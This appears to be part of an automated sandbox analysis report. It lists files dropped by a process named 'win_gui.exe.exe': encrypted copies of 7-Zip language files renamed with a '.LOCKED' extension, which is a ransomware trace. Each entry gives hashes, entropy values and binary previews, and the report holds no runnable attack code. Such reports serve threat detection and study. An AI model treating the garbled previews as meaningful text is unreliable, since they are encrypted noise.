                                File Type:data
                                Category:dropped
                                Size (bytes):10897
                                Entropy (8bit):7.981257443509297
                                Encrypted:false
                                SSDEEP:192:TscAZgofTWALMmb3b6QdmHLEPPQQVGjH1f5VweN5bEz8/HpaVKwE+VOn:TscMlTWALMmPjdmYovVxS454A/J0KwEb
                                MD5:3EDCFDB75A6C4D91DFD3A8389F9DACAD
                                SHA1:D7E4B4CDD7CB2EE71805B0F5815A9FD64FFA8094
                                SHA-256:74FECCCD84283E342AA8CE37D6373A0926606EC149DA114481A8A64103790E98
                                SHA-512:78C0334943AF00BC22236E335972FF3D7760D48E194BECAEFEF24730722896CDCF1A86E5DECAA50E7983CD3857682DC02867807CC06EA0790EE2ED04432ADE6B
                                Malicious:false
                                Preview:.y.^).....l+..og...F....mP.Q..k.V6.2.!.J...CT............bY......d...\J..Mx].1W.f/..[.Z.|q.s`Av...l........M..y7..s...s>..d..<.xE.b.i.D..K#.... Xr.H...(.......,J.c7.<A,o5..=EA..3.BX.?*.... .F..n..?S....>..T...<.....&.Q....yB.....W.....s.om...w.NY.1.......^(sX. .4H2.^S.6...].}.1..|....|...5|Yw,.Xv.....|..#bW....f.oc<.b#. .....g..`]...~..-.+.....JEZ.MF...h..S....y)).,0.L.<l.RX<...A....?.^.P#K..%.y....~.6..E..^P.Y...s.#.(X..b..KH]...`.....d...%Q.1.+..8$...9*7.oI.x.../B.......?..S0.U.....f...QfT=..L.2K]%3k.L.L..'.R....PI.`M....../.R0l..<U......#..nK#...I.'..(..|...6....l...4.'.>9.\.f.jV...1..\.Q.u....."C....'|.$..o....&n).y..UX${..x.n.T.aQ.i.4jE0..4.Z\.v..S...c.j.k....y2[..K........o^h.[..m.)).7..~U.M.f.uu.6..a".....N}.Y.mca.....Nr..o#....K..Ey.y.].u~.gk....G.....~.a...+.c.Qk:.S.:.5.G.q..Ni!.>..r_..M."...F..a...UR[z"...\..r...&y\..|.FU7.r|...|....y.`....inX?2;.J.r.v.O....%.....,..Y$L.p...K._.P.)F....h.T..7..S)....[`.a3....B..{&.C...1.bII.b..4|S.

                                C:\Program Files\7-Zip\Lang\ku-ckb.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12945
                                Entropy (8bit):7.985033327958154
                                Encrypted:false
                                SSDEEP:384:PX/hLTaS1imbQgJiGCpEopww5TF02YSFMBT4uh+VOb:11rsp1pHewj028BUw3
                                MD5:DCA25D37248EEC71F56FEDE6922F41FF
                                SHA1:2977CF528C1028FFE434D4E14BD0FB7C634FE217
                                SHA-256:AC27FFADCD902885A6A86C50285A280076757AD4EC829E63D2675B40DEE17926
                                SHA-512:72F36E46FCC5FDD6CB27B475D613B6D91225CC1B81CD5F7F64370F74D35802ABCDBA0C0A9A32EE898775B5B7955EA878EA7465C87FCD5E47582BA529AC180742
                                Malicious:false
                                Preview:.u.L..........rz..p.Hq............4\.1.....)...=.#.*..?..`...;..K....S?..b.~4_.k....N3.:....MK...H=..x.R...ie.I.....`mF..c...N.>...v..o.e1.!..O\.U..z.{..nV..N..W......^SF.l.2.y..48h......=...a.n./4.$..%..Ce;.'../2....`.....J.~.;`.lV......N...nlpL..h!..o.}...M..I.4.h./.h...6...I.Rm].......2..ip..~.Hx..&j'..[r.H.r.....).....-H.`nBOW.B..d.X..f.7......W..X.y.t...;.7^.....[ROk.QZ./..y....K.)C..uS...I@\t:.....SI^.i.yt^.+..ls.|...7..;..BQx.Ff..NU......z.'F..%.kWS.....w..q..A..`u..}..u.^r.=.1.....i....YL.C./.\....'..3.,Q:.o.t..)Uv-.Q.g......%.....Q/...3...o...aH.......b.`.W...C.."....[4.a.a.....j.4*..M.Tq.6."U9....C.T.....,&..PV....21...[....B.?......<i..L...Dg...g.2.E4./.c..?....]DK..Q.Y..3Ps......7U....om.S..............j..w..uK..h.7u.......g#..x-c.*Y#t.9q._?.:1..)p...#.r..v..x....Q...".]..p;.o.v..Y.....VRX.V..e.tv$B3.T.OH.G_..O...N,..S../.6}..g)..dIl..p.R.Z=4...5.4i......mf.V\D.....p6..$.....;..=.P}..h.DQ...<..rz.$....$,^}....+j.".~.C.I.w..o.

                                C:\Program Files\7-Zip\Lang\ku-ckb.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12945
                                Entropy (8bit):7.985033327958154
                                Encrypted:false
                                SSDEEP:384:PX/hLTaS1imbQgJiGCpEopww5TF02YSFMBT4uh+VOb:11rsp1pHewj028BUw3
                                MD5:DCA25D37248EEC71F56FEDE6922F41FF
                                SHA1:2977CF528C1028FFE434D4E14BD0FB7C634FE217
                                SHA-256:AC27FFADCD902885A6A86C50285A280076757AD4EC829E63D2675B40DEE17926
                                SHA-512:72F36E46FCC5FDD6CB27B475D613B6D91225CC1B81CD5F7F64370F74D35802ABCDBA0C0A9A32EE898775B5B7955EA878EA7465C87FCD5E47582BA529AC180742
                                Malicious:false
                                Preview:.u.L..........rz..p.Hq............4\.1.....)...=.#.*..?..`...;..K....S?..b.~4_.k....N3.:....MK...H=..x.R...ie.I.....`mF..c...N.>...v..o.e1.!..O\.U..z.{..nV..N..W......^SF.l.2.y..48h......=...a.n./4.$..%..Ce;.'../2....`.....J.~.;`.lV......N...nlpL..h!..o.}...M..I.4.h./.h...6...I.Rm].......2..ip..~.Hx..&j'..[r.H.r.....).....-H.`nBOW.B..d.X..f.7......W..X.y.t...;.7^.....[ROk.QZ./..y....K.)C..uS...I@\t:.....SI^.i.yt^.+..ls.|...7..;..BQx.Ff..NU......z.'F..%.kWS.....w..q..A..`u..}..u.^r.=.1.....i....YL.C./.\....'..3.,Q:.o.t..)Uv-.Q.g......%.....Q/...3...o...aH.......b.`.W...C.."....[4.a.a.....j.4*..M.Tq.6."U9....C.T.....,&..PV....21...[....B.?......<i..L...Dg...g.2.E4./.c..?....]DK..Q.Y..3Ps......7U....om.S..............j..w..uK..h.7u.......g#..x-c.*Y#t.9q._?.:1..)p...#.r..v..x....Q...".]..p;.o.v..Y.....VRX.V..e.tv$B3.T.OH.G_..O...N,..S../.6}..g)..dIl..p.R.Z=4...5.4i......mf.V\D.....p6..$.....;..=.P}..h.DQ...<..rz.$....$,^}....+j.".~.C.I.w..o.

                                C:\Program Files\7-Zip\Lang\ku.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6382
                                Entropy (8bit):7.966840648851026
                                Encrypted:false
                                SSDEEP:192:dlPfm7QGaVpYVVtt/CtIJz2c2lRV6gIe+VOZ:dlPfmjKWl8O2f74W+VOZ
                                MD5:3E86E5207A33B08CF40B1A37365D05D0
                                SHA1:F4284DA5549868F918064AAB16A4154E4E768C44
                                SHA-256:433EE5390496C4E9E4E1E5049BB4576D9D8F2D5A113E6EF01A78BAEC2F126714
                                SHA-512:CAD64EF92A7289ED802372F32470BB99BEDF12E356D4A8BCAB2D4CBB0095DAA935FDCC4051071CC21B8E06C736BCBF9E9D21D63A3E2B12704B9EC2A45F1A2A99
                                Malicious:false
                                Preview:....?.p...f.o.BP5..Y....'....L.a.\R..A...l..&xD.7J...2...'IS=>gW.....70..{..........^.._.~W.....<..i"6t^..J.O..H.......c..$...Hz{.:.!..../.z.J1.k...Y.3.aS.,...f...........5U..r.*..60...e.....K.J...wu...t.....-..V.>...h...7..[.COZ. ..t.k......G...`...i...\Ws.?.c.3."w.y.W{.._RP...;D.>Czy6....).D.v......B.$.R.#.?.FX...2.$ZJ..'.P...ls.f..S.n....U.+.38.[.......P.22..m.....8L...b..$..D;....;=Y,g..yO{/../...g[.;.T.......S9euy..3<.......E.S..o.."`A..?..... .....Q.._.......n....,.#|.lR.(......a.BZ......0A..d.z..mV..>..y.j.....).....8....`....~.y..>...`.]..$MR.2.N.;...wV...L.E1.KN..., .GiM..Mb}..;.X:....U.'.3..h#.X.Q.%@|.c:$.$B.<..Z.+..L..*..9!.T..c<e..tJ:...2.@u..s.J..H...2/..K.8...8..YWl..q,..Kx.F .=M....h.m..=u.C..F.X..F.LW.&.?...6.. '..#.f.e......f.8/....m....'.Z..b.i.C....X`{.2..\;...#.C$A...y2...|a...,P....rNoq..n....+..1.@..I.&5D.....Y......7V.k.H....0.'.g...5....!M...3."..|.Q..0...2O......C+...C..... .%6.......9_..;(.v....e...#%K@$[....~Oh

                                C:\Program Files\7-Zip\Lang\ku.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6382
                                Entropy (8bit):7.966840648851026
                                Encrypted:false
                                SSDEEP:192:dlPfm7QGaVpYVVtt/CtIJz2c2lRV6gIe+VOZ:dlPfmjKWl8O2f74W+VOZ
                                MD5:3E86E5207A33B08CF40B1A37365D05D0
                                SHA1:F4284DA5549868F918064AAB16A4154E4E768C44
                                SHA-256:433EE5390496C4E9E4E1E5049BB4576D9D8F2D5A113E6EF01A78BAEC2F126714
                                SHA-512:CAD64EF92A7289ED802372F32470BB99BEDF12E356D4A8BCAB2D4CBB0095DAA935FDCC4051071CC21B8E06C736BCBF9E9D21D63A3E2B12704B9EC2A45F1A2A99
                                Malicious:false
                                Preview:....?.p...f.o.BP5..Y....'....L.a.\R..A...l..&xD.7J...2...'IS=>gW.....70..{..........^.._.~W.....<..i"6t^..J.O..H.......c..$...Hz{.:.!..../.z.J1.k...Y.3.aS.,...f...........5U..r.*..60...e.....K.J...wu...t.....-..V.>...h...7..[.COZ. ..t.k......G...`...i...\Ws.?.c.3."w.y.W{.._RP...;D.>Czy6....).D.v......B.$.R.#.?.FX...2.$ZJ..'.P...ls.f..S.n....U.+.38.[.......P.22..m.....8L...b..$..D;....;=Y,g..yO{/../...g[.;.T.......S9euy..3<.......E.S..o.."`A..?..... .....Q.._.......n....,.#|.lR.(......a.BZ......0A..d.z..mV..>..y.j.....).....8....`....~.y..>...`.]..$MR.2.N.;...wV...L.E1.KN..., .GiM..Mb}..;.X:....U.'.3..h#.X.Q.%@|.c:$.$B.<..Z.+..L..*..9!.T..c<e..tJ:...2.@u..s.J..H...2/..K.8...8..YWl..q,..Kx.F .=M....h.m..=u.C..F.X..F.LW.&.?...6.. '..#.f.e......f.8/....m....'.Z..b.i.C....X`{.2..\;...#.C$A...y2...|a...,P....rNoq..n....+..1.@..I.&5D.....Y......7V.k.H....0.'.g...5....!M...3."..|.Q..0...2O......C+...C..... .%6.......9_..;(.v....e...#%K@$[....~Oh

                                C:\Program Files\7-Zip\Lang\ky.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13064
                                Entropy (8bit):7.986546990111769
                                Encrypted:false
                                SSDEEP:384:bznUyA9V//VK8pAY1A0IHv+B00iQzlJvJ1NRnMUF+VOW:PrA9V//iY1OvkjJvjNBzF6
                                MD5:BAAEBD3321BE2DCE32CEA7DE4A1BBD5F
                                SHA1:A6936A7CA403378FE0BD0B3AAEEF2115823CFC97
                                SHA-256:5F6EC671FA0B8CDF6EE3DD2B5CFDF3ABEFF68F053B9DC1F6259C0BF63C54D331
                                SHA-512:A4749D77251FEF179964E9BDC337B02940252376F930C40DE64D038B64BC08CEE7929F675B879788371A47EA50DB9333C53C5EBF89C6B59C701E81F5F1182EA9
                                Malicious:false
                                Preview::T.`o%.0U....]..J.......-.'..*...z^..A..i.Vc......e2...-.o.n...m..#:..S.'-....[....r.s...&G......;.-...=........,}.A.{/...w....~....n.....g.,..'.8h..5.L.C,..bS...C.H..t'......M.;-...Q|..X...r..jS=..<M....-..v......0uC..AL...N...y\..Su?...>..."...........f......M;G#.,.....d.e...`n.L...s'.w....$..g.d.(K:.........."..b.,.t..B.n.Wj++!.a.~=..m...|...ZL.....]....F..::cw.q.O....A.....%.@.B...2...P...y.Lb...c.H..-......V'a.&...A..p.H..fj...9s\..].+..ey.............D.q..>.o..aH...J..KSD.wP...vS......W..]tr..)-P.!p*Pt.............r!...2.&..$...3nGh...d3.....o..n.B.H....m.....0.T..s.P..U.[...h..su..u..9.O...y...' .#..#..<T..eJU..x...[....y>...x. g..._.[G_4C..Lj_.g.LJ8.f.._;...\>E]..EM....&.......^.i.U...0..9.D?L..<...M(.O.5..cS....0.....h#A.4.V.I..WB.$...d..j.2|.'.c...c8....C..v.f`.TK...\v........}.../.j.1....j.j..vd`...6-...Z..v.t...u7..Q%.4)...[..w?OX........y.A...c<.v-.N.^..!.-.O..r.T....5.....`yb...7neY.!.m..._`.X.*fD.P%;x...`&....^..9.I..T...>.

                                C:\Program Files\7-Zip\Lang\ky.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13064
                                Entropy (8bit):7.986546990111769
                                Encrypted:false
                                SSDEEP:384:bznUyA9V//VK8pAY1A0IHv+B00iQzlJvJ1NRnMUF+VOW:PrA9V//iY1OvkjJvjNBzF6
                                MD5:BAAEBD3321BE2DCE32CEA7DE4A1BBD5F
                                SHA1:A6936A7CA403378FE0BD0B3AAEEF2115823CFC97
                                SHA-256:5F6EC671FA0B8CDF6EE3DD2B5CFDF3ABEFF68F053B9DC1F6259C0BF63C54D331
                                SHA-512:A4749D77251FEF179964E9BDC337B02940252376F930C40DE64D038B64BC08CEE7929F675B879788371A47EA50DB9333C53C5EBF89C6B59C701E81F5F1182EA9
                                Malicious:false
                                Preview::T.`o%.0U....]..J.......-.'..*...z^..A..i.Vc......e2...-.o.n...m..#:..S.'-....[....r.s...&G......;.-...=........,}.A.{/...w....~....n.....g.,..'.8h..5.L.C,..bS...C.H..t'......M.;-...Q|..X...r..jS=..<M....-..v......0uC..AL...N...y\..Su?...>..."...........f......M;G#.,.....d.e...`n.L...s'.w....$..g.d.(K:.........."..b.,.t..B.n.Wj++!.a.~=..m...|...ZL.....]....F..::cw.q.O....A.....%.@.B...2...P...y.Lb...c.H..-......V'a.&...A..p.H..fj...9s\..].+..ey.............D.q..>.o..aH...J..KSD.wP...vS......W..]tr..)-P.!p*Pt.............r!...2.&..$...3nGh...d3.....o..n.B.H....m.....0.T..s.P..U.[...h..su..u..9.O...y...' .#..#..<T..eJU..x...[....y>...x. g..._.[G_4C..Lj_.g.LJ8.f.._;...\>E]..EM....&.......^.i.U...0..9.D?L..<...M(.O.5..cS....0.....h#A.4.V.I..WB.$...d..j.2|.'.c...c8....C..v.f`.TK...\v........}.../.j.1....j.j..vd`...6-...Z..v.t...u7..Q%.4)...[..w?OX........y.A...c<.v-.N.^..!.-.O..r.T....5.....`yb...7neY.!.m..._`.X.*fD.P%;x...`&....^..9.I..T...>.

                                C:\Program Files\7-Zip\Lang\lij.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8483
                                Entropy (8bit):7.977115834469991
                                Encrypted:false
                                SSDEEP:192:Rh6BU3nlZqXpwPmsI9moh4WWIjlWyWDX3pHucQ3PR6v+VOO:eg7XmsI4oyIjlvW9uP3PY+VOO
                                MD5:E451C76E48B2EA1C9CC0739A65D77679
                                SHA1:D7387584D963539D5536E75AF74326FD34030900
                                SHA-256:4B8C5B4C262B409E061ADEF36AB39487F33C8400597063F32176D38D39475995
                                SHA-512:959EB8FF971646C3DF49ED87A7F2C3E97C5635A570658450C1FDF32639906008F395ED3947F8EF08FCB39B43A14F03B35E3014D1F091251A6E25074E8FDC8F08
                                Malicious:false
                                Preview:s.Q....5.de.......Q+;...fsLrU....W ./q.Q... .1.uP...|Z.f.(..o.....~.P.kz.V]t.R..#..J..U...[^.x...:f....f..r..%t(Dn.?..Dc.......].;Ke.OA.9h#...@.+%.}.t.W'..LO ...I.R.....&.Pz.&..B.....i......{$/c...-...@{*...\........./....|'.Du..<.y..t.r.9...=..G..A_..(.,.T.....%...B......Jp...U....F..9p.X*EZ.....>.j.H..g....).:..=F-..E./.....w....E>..a..tn.@...$.rv.,n.v.%......|zw-..X..,...m...}ZH.../.M.{.Nk..5v6...P?.C...by..{...l=G3..e..r...k.O.+..?x....(.T>~'. w#...R..-. ..S.2a.. .....K.....m......Z...k..%.m.y..B(,..~...m8p.5M...S.q..<......[..[..@.m2V.......a.>..2.....g...x..+b.y."g...=h.Qd...tP..WbL.....uj}.....A|N.C.+...(H..Z..D..\0.q.Cop...q...V..K.UM.~*.<}..(n...8t].7..5.......5bPB.".8p.....^W...J..L.-.YpO.n.wm.H<o{z.:...Z.G..5R".$(.........l...eY.7..~..:.fufd..Rc..`8.T..m..D..[.E?.I..l...!........'.Q...>..j#...z..YE...t.U.1S.:'....'V...7.....qv.-7..&.......I.d..........h.#.R....0x..{.......u.aQP\i.P....MLQYX.../..3.:.!K[.h...i...9

                                C:\Program Files\7-Zip\Lang\lij.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8483
                                Entropy (8bit):7.977115834469991
                                Encrypted:false
                                SSDEEP:192:Rh6BU3nlZqXpwPmsI9moh4WWIjlWyWDX3pHucQ3PR6v+VOO:eg7XmsI4oyIjlvW9uP3PY+VOO
                                MD5:E451C76E48B2EA1C9CC0739A65D77679
                                SHA1:D7387584D963539D5536E75AF74326FD34030900
                                SHA-256:4B8C5B4C262B409E061ADEF36AB39487F33C8400597063F32176D38D39475995
                                SHA-512:959EB8FF971646C3DF49ED87A7F2C3E97C5635A570658450C1FDF32639906008F395ED3947F8EF08FCB39B43A14F03B35E3014D1F091251A6E25074E8FDC8F08
                                Malicious:false
                                Preview:s.Q....5.de.......Q+;...fsLrU....W ./q.Q... .1.uP...|Z.f.(..o.....~.P.kz.V]t.R..#..J..U...[^.x...:f....f..r..%t(Dn.?..Dc.......].;Ke.OA.9h#...@.+%.}.t.W'..LO ...I.R.....&.Pz.&..B.....i......{$/c...-...@{*...\........./....|'.Du..<.y..t.r.9...=..G..A_..(.,.T.....%...B......Jp...U....F..9p.X*EZ.....>.j.H..g....).:..=F-..E./.....w....E>..a..tn.@...$.rv.,n.v.%......|zw-..X..,...m...}ZH.../.M.{.Nk..5v6...P?.C...by..{...l=G3..e..r...k.O.+..?x....(.T>~'. w#...R..-. ..S.2a.. .....K.....m......Z...k..%.m.y..B(,..~...m8p.5M...S.q..<......[..[..@.m2V.......a.>..2.....g...x..+b.y."g...=h.Qd...tP..WbL.....uj}.....A|N.C.+...(H..Z..D..\0.q.Cop...q...V..K.UM.~*.<}..(n...8t].7..5.......5bPB.".8p.....^W...J..L.-.YpO.n.wm.H<o{z.:...Z.G..5R".$(.........l...eY.7..~..:.fufd..Rc..`8.T..m..D..[.E?.I..l...!........'.Q...>..j#...z..YE...t.U.1S.:'....'V...7.....qv.-7..&.......I.d..........h.#.R....0x..{.......u.aQP\i.P....MLQYX.../..3.:.!K[.h...i...9

                                C:\Program Files\7-Zip\Lang\lt.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10133
                                Entropy (8bit):7.981698705304034
                                Encrypted:false
                                SSDEEP:192:3Sh1E8iVYT8C9iKToz5HSmmc2IKZq4vIfzFlf4TXAytt6uNA0fZNGpuE+VOBq:ih/HRcKToz5HS02IKoKmzFlf4dtFTfZN
                                MD5:BB22305D0B0D1E926F99740AEDCEFE14
                                SHA1:F3305BFED8920FDC37BD5B628D73049000118246
                                SHA-256:0CE2641EF96F44D3662F853E90BD9F2751B29D15B7C37672688C28ADA98D5947
                                SHA-512:C2AB054360FF87338EC14244430931EA9034BEB6B39FC179B42B51B5463EE46A4B4BFB63B61386ED3F0DA019FD238A7933582439E6C3CC6C3972808ACC6A9850
                                Malicious:false
                                Preview:.x.H....hm.....G./.....,T@.....*K.7B....B..... ..|....a.|.......|.>..h"P..N..}.Q.l...;..b..j..4.W...-.2c.e.m.H...>.O{..../...E..q.Z./F.+~..\pU}.=..Ca.H....Q....r.=....P...c....\.zX.."..O..:...)...So.BHk D.... l...H.t..t5..z.F..=..E..'..I15.7..*V........*<........'........./.%B7.}n~[.\`.Sx...,..?..4.}.G..:SvY^..}.r1r>...[.qV..Pqy.V./k.....1'.V...m.4......:e).`#.\..!..-../Wlv.q...Y....%].DS.V8$..h......>@_.N).3...cq....o.V..uK...|E.7.....}L..\..1.....sE.....51..C..[S...(Y..'+....-..{.W`yD^x4dvJ.".x~..O..V.>..3.l2.}ngW`.....R..]......-....Q.,..!T.d...`um).9.$.$x.E.... .W.}..H....|o.$..D.9S.E.N.&...F. .k..9.O.o/..#.W.../.....%q..~..*f.Ap..(I1..l..?!.r.JA3....^P.....}..b8....E.i.-......P...,...Z..PCs.........(./..5.....E~6....hJVd...:H......K..,...Te.'%.........at.rKaZ....nj...9+s~%-o+..%...n.h" ...Q.......&...+j...:.>{K...76C..v..u...9.x..j.-4.{!'..R...;......J.M....-...@."Ocp.5I<..d....4./..i..|q......r...[......9NIr..k..x....V\.Y[.

                                C:\Program Files\7-Zip\Lang\lt.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10133
                                Entropy (8bit):7.981698705304034
                                Encrypted:false
                                SSDEEP:192:3Sh1E8iVYT8C9iKToz5HSmmc2IKZq4vIfzFlf4TXAytt6uNA0fZNGpuE+VOBq:ih/HRcKToz5HS02IKoKmzFlf4dtFTfZN
                                MD5:BB22305D0B0D1E926F99740AEDCEFE14
                                SHA1:F3305BFED8920FDC37BD5B628D73049000118246
                                SHA-256:0CE2641EF96F44D3662F853E90BD9F2751B29D15B7C37672688C28ADA98D5947
                                SHA-512:C2AB054360FF87338EC14244430931EA9034BEB6B39FC179B42B51B5463EE46A4B4BFB63B61386ED3F0DA019FD238A7933582439E6C3CC6C3972808ACC6A9850
                                Malicious:false
                                Preview:.x.H....hm.....G./.....,T@.....*K.7B....B..... ..|....a.|.......|.>..h"P..N..}.Q.l...;..b..j..4.W...-.2c.e.m.H...>.O{..../...E..q.Z./F.+~..\pU}.=..Ca.H....Q....r.=....P...c....\.zX.."..O..:...)...So.BHk D.... l...H.t..t5..z.F..=..E..'..I15.7..*V........*<........'........./.%B7.}n~[.\`.Sx...,..?..4.}.G..:SvY^..}.r1r>...[.qV..Pqy.V./k.....1'.V...m.4......:e).`#.\..!..-../Wlv.q...Y....%].DS.V8$..h......>@_.N).3...cq....o.V..uK...|E.7.....}L..\..1.....sE.....51..C..[S...(Y..'+....-..{.W`yD^x4dvJ.".x~..O..V.>..3.l2.}ngW`.....R..]......-....Q.,..!T.d...`um).9.$.$x.E.... .W.}..H....|o.$..D.9S.E.N.&...F. .k..9.O.o/..#.W.../.....%q..~..*f.Ap..(I1..l..?!.r.JA3....^P.....}..b8....E.i.-......P...,...Z..PCs.........(./..5.....E~6....hJVd...:H......K..,...Te.'%.........at.rKaZ....nj...9+s~%-o+..%...n.h" ...Q.......&...+j...:.>{K...76C..v..u...9.x..j.-4.{!'..R...;......J.M....-...@."Ocp.5I<..d....4./..i..|q......r...[......9NIr..k..x....V\.Y[.

                                C:\Program Files\7-Zip\Lang\lv.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6028
                                Entropy (8bit):7.968488705223102
                                Encrypted:false
                                SSDEEP:96:7R/q7maUEn8f0j7IwIMIKrHC2E39nCgOszY/qfXlYLMgTpFDyFiTlrPQWBFDOev3:7Ri7maX8a5l6nCbTCfzgTCiTNPh6+VOY
                                MD5:9DFECCFBFB8489E376D92D46EA8CBAE7
                                SHA1:93847896288C0D431C3C18A3792081187FAD46EC
                                SHA-256:CC2A02DFE2D09F04055BEDAB33B7BD19AF12621D27BD0DF71CC6DA244551451B
                                SHA-512:A975766564503026EF85C1195196D063E680190627AC36B1B0368879E7FFD28DF059EC57A9FD8E7BA435B54FCCA5E7A5CCAFE8EB6D9EA3E1215E647DACADCC16
                                Malicious:false
                                Preview:(....Q..I}&.^...o8......O..&...h...lEO.|...[.............>3...C.2S............kq:G_"..Y>..c`1p.......#a7...Lq..8........3...$QiE0<...*.r......T.....Q.X.@h.v.U.!.,6.]6,H.......B..#. ..A.V.;.kX_.z:+.......%\io.........LT.......RWb.2.....,....$i.wH9. FQ.Q.w..pa'....=Rs...x.M..PL.%........r1/.;'T...F...J...Bj0o`..{X=..$..b......N'..<.0......h=iF."_]+..U`.....;a..ec...Z..I..Sz.m}..#.........R.7Uh0..._.c.Jx...13..u..M;U.o5.g.1.tW$.".9..].;;;....H....:.Xa8 .#r.&..{L.3*D..c0....~#8.T.%.........J....X(Y..D`..a`.:...+.~.......m...4E.....+.#."..=\.e.6_.n....u..4)czB0m:.......{.#.B...`I........3.S..Z.nZ.h7p...\C.. A..[o.C.Y.k.[..6_1Ir...}.t...J....t.....9..i9......'..-o.B.......BB~:......fK.)Ls(..!<}|N....g.:X.K=H&q....7zKCl.l..8.L.JVa.;...V...j.Y.z...^....5y...cD..7H6B.M.s..n.6.....lq..#...i.F..L......@...\=.k.5..x...1@.,C2......|.,'....7....3..I..8V~G,.E%.....d.U.!.....*i.....d./..=.Q.\...#.fC..>.X...\..qWv.......K.P..G@a+\.N..!Hd....wd.7..\gn..

                                C:\Program Files\7-Zip\Lang\lv.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6028
                                Entropy (8bit):7.968488705223102
                                Encrypted:false
                                SSDEEP:96:7R/q7maUEn8f0j7IwIMIKrHC2E39nCgOszY/qfXlYLMgTpFDyFiTlrPQWBFDOev3:7Ri7maX8a5l6nCbTCfzgTCiTNPh6+VOY
                                MD5:9DFECCFBFB8489E376D92D46EA8CBAE7
                                SHA1:93847896288C0D431C3C18A3792081187FAD46EC
                                SHA-256:CC2A02DFE2D09F04055BEDAB33B7BD19AF12621D27BD0DF71CC6DA244551451B
                                SHA-512:A975766564503026EF85C1195196D063E680190627AC36B1B0368879E7FFD28DF059EC57A9FD8E7BA435B54FCCA5E7A5CCAFE8EB6D9EA3E1215E647DACADCC16
                                Malicious:false
                                Preview:(....Q..I}&.^...o8......O..&...h...lEO.|...[.............>3...C.2S............kq:G_"..Y>..c`1p.......#a7...Lq..8........3...$QiE0<...*.r......T.....Q.X.@h.v.U.!.,6.]6,H.......B..#. ..A.V.;.kX_.z:+.......%\io.........LT.......RWb.2.....,....$i.wH9. FQ.Q.w..pa'....=Rs...x.M..PL.%........r1/.;'T...F...J...Bj0o`..{X=..$..b......N'..<.0......h=iF."_]+..U`.....;a..ec...Z..I..Sz.m}..#.........R.7Uh0..._.c.Jx...13..u..M;U.o5.g.1.tW$.".9..].;;;....H....:.Xa8 .#r.&..{L.3*D..c0....~#8.T.%.........J....X(Y..D`..a`.:...+.~.......m...4E.....+.#."..=\.e.6_.n....u..4)czB0m:.......{.#.B...`I........3.S..Z.nZ.h7p...\C.. A..[o.C.Y.k.[..6_1Ir...}.t...J....t.....9..i9......'..-o.B.......BB~:......fK.)Ls(..!<}|N....g.:X.K=H&q....7zKCl.l..8.L.JVa.;...V...j.Y.z...^....5y...cD..7H6B.M.s..n.6.....lq..#...i.F..L......@...\=.k.5..x...1@.,C2......|.,'....7....3..I..8V~G,.E%.....d.U.!.....*i.....d./..=.Q.\...#.fC..>.X...\..qWv.......K.P..G@a+\.N..!Hd....wd.7..\gn..

                                C:\Program Files\7-Zip\Lang\mk.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9364
                                Entropy (8bit):7.979071230498844
                                Encrypted:false
                                SSDEEP:192:eIQbi+ZuhP0k7gB7JqFc87FY9ANWgulbX02QHD+VO8Qa:e2xhck7gBM6KYKNHuldQj+VOza
                                MD5:9401D58D3219EFC9E2450EC9B116D545
                                SHA1:58FE21C687A75B09E20626988CD31C14CF1D1E25
                                SHA-256:2759336065620DF2B408D7EAD61BAD2971084CC79E23C5DE964F084F4D5BF6AF
                                SHA-512:39C497F4FA43F77FEA4A51EE694FF86841991BDCC90637D6F90545358875B90004BAEF71B94AFFDBC0EF438D833F853EF8D1FE2473A99447B609A8B66F66C4B1
                                Malicious:false
